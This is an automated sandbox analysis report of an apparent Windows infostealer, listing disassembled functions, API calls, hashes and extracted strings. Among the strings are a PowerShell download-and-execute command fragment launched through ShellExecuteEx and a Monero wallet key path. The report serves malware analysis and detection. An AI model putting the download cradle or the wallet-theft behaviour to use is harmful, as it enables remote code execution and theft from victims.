                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: c90c4fc4e796669c140048341d5f868adabe687ee4ad6b97d9c8cba08968e478
                            • Instruction ID: 1a5310292cc60ad36df305448b79d33a10235566f040045a88699005c4e167ef
                            • Opcode Fuzzy Hash: c90c4fc4e796669c140048341d5f868adabe687ee4ad6b97d9c8cba08968e478
                            • Instruction Fuzzy Hash: DB4134B110078C5EDF218B24CD84FFBBBEEAF05314F1444ECE98A86582E2719A45DF24
                            Function 00694780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,013AD918), ref: 006947DB
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694801
                            • lstrcat.KERNEL32(?,?), ref: 00694820
                            • lstrcat.KERNEL32(?,?), ref: 00694834
                            • lstrcat.KERNEL32(?,0139B220), ref: 00694847
                            • lstrcat.KERNEL32(?,?), ref: 0069485B
                            • lstrcat.KERNEL32(?,013AD3B8), ref: 0069486F
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                              • Part of subcall function 00694570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                              • Part of subcall function 00694570: RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                              • Part of subcall function 00694570: wsprintfA.USER32 ref: 006945A6
                              • Part of subcall function 00694570: FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                            • Instruction ID: d5c2a67e9a39eb1cbaa07e4991f9ca75f096378449b7f9dab660a76c21a7b2e0
                            • Opcode Fuzzy Hash: db0faa8aeac9e54bec5eacabfa5c1789ea3bef9fef31d560ddf27f1ea503c7b2
                            • Instruction Fuzzy Hash: 37316EB290021CABCB54FBB0DC85EE9737DBB48704F40459DB31996081EE749689CB9A
                            Function 00692C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00692D85
                            Strings
                            • ')", xrefs: 00692CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00692D04
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00692CC4
                            • <, xrefs: 00692D39
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                            • Instruction ID: 2cdf2450af6432163caf6e7ac4337061ccc5120c63ebada4283a0595b62eb039
                            • Opcode Fuzzy Hash: a52cfcf191093cf4dfbc2cd743a1e6441c92277635060ce7b0825e4cc20ebaea
                            • Instruction Fuzzy Hash: 3541CB718102189ADF54FBE0C992BEDB7BABF14300F40411DE006A7591DF746A4ACFDA
                            Function 00689E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00689F41
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 033ca968dbbd1361f1104e786985b8d3d7ca87894612e9e8c24324a85e7be466
                            • Instruction ID: 87768a7ec25cd7aab2df2c047baa0a1a6f321b78b1bb7d6349272c1b60004b9d
                            • Opcode Fuzzy Hash: 033ca968dbbd1361f1104e786985b8d3d7ca87894612e9e8c24324a85e7be466
                            • Instruction Fuzzy Hash: C5612D70A10248DBDF14EFA4CD96FED77BAAF45304F008118F90A9F591EB706A06CB96
                            Function 006970D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • memset.MSVCRT ref: 0069716A
                            Strings
                            • si, xrefs: 006972AE, 00697179, 0069717C
                            • si, xrefs: 00697111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0069718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: si$si$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-4068855434
                            • Opcode ID: ac7cfe3b3eddee9162d28b44b26b0fe9a9e8c2e205eae82552e043b2893bd61e
                            • Instruction ID: ebc5dfa74b3770a1b8d6c13b45b17e578916066892b3a5f9868987645116058c
                            • Opcode Fuzzy Hash: ac7cfe3b3eddee9162d28b44b26b0fe9a9e8c2e205eae82552e043b2893bd61e
                            • Instruction Fuzzy Hash: 74518FB0C142189BDF54EB90DD85BEEB3BAAF04304F2440ADE60567681EB746E89CF58
                            Function 00697E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B6C8,00000000,00020119,?), ref: 00697E5E
                            • RegQueryValueExA.ADVAPI32(?,013AD398,00000000,00000000,000000FF,000000FF), ref: 00697E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00697E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                            • Instruction ID: 7ada373f0df84e31523477aa254055fea2af42020d433445b9c9c0064b37c3f9
                            • Opcode Fuzzy Hash: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                            • Instruction Fuzzy Hash: 1F1170B1A44209EBDB08CF95DD49FBBBBBDFB44B14F104169F605A7680D7745C018BA1
                            Function 00699260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(013AD9F0,?,?,?,0069140C,?,013AD9F0,00000000), ref: 0069926C
                            • lstrcpyn.KERNEL32(008CAB88,013AD9F0,013AD9F0,?,0069140C,?,013AD9F0), ref: 00699290
                            • lstrlen.KERNEL32(?,?,0069140C,?,013AD9F0), ref: 006992A7
                            • wsprintfA.USER32 ref: 006992C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                            • Instruction ID: 22b44be23559a09b600e01ea1711c54c8118c5f2a40de5a83ef9a6f1b77d9691
                            • Opcode Fuzzy Hash: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                            • Instruction Fuzzy Hash: 8D01977550010CFFCB08DFECD988EAE7BB9FB44368F148148F9099B604C635AE509B91
                            Function 006812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                            • RegCloseKey.ADVAPI32(?), ref: 006812FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                            • Instruction ID: 4af25865cfd4aa7625a67362c942dbc0ed2a456675e6f40a157ebc6525b52e37
                            • Opcode Fuzzy Hash: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                            • Instruction Fuzzy Hash: 07011DB9A4020CBBDB04DFE0DC49FAEB7B8FB48705F008159FA0597280D6719A018B51
                            Function 00696630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696663
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00696726
                            • ExitProcess.KERNEL32 ref: 00696755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                            • Instruction ID: b6e6a7264e95985509722462fbf47d10df5a47f5d92e5fd2bac7cbf7f3262185
                            • Opcode Fuzzy Hash: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                            • Instruction Fuzzy Hash: 393127B1801218ABDB58EB90DD86FDEB7BDBF04300F404189F20966191DF746A48CFAA
                            Function 006987C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E28,00000000,?), ref: 0069882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698836
                            • wsprintfA.USER32 ref: 00698850
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                            • Instruction ID: c7e0a861ac91e5bf3000c6a050531de0fce3c7edb0353227afabb7b877ee9b7e
                            • Opcode Fuzzy Hash: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                            • Instruction Fuzzy Hash: AE211FB1E40208AFDB04DFD4DD49FAEBBB9FB48715F104119F605A7680C779A901CBA1
                            Function 00698D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
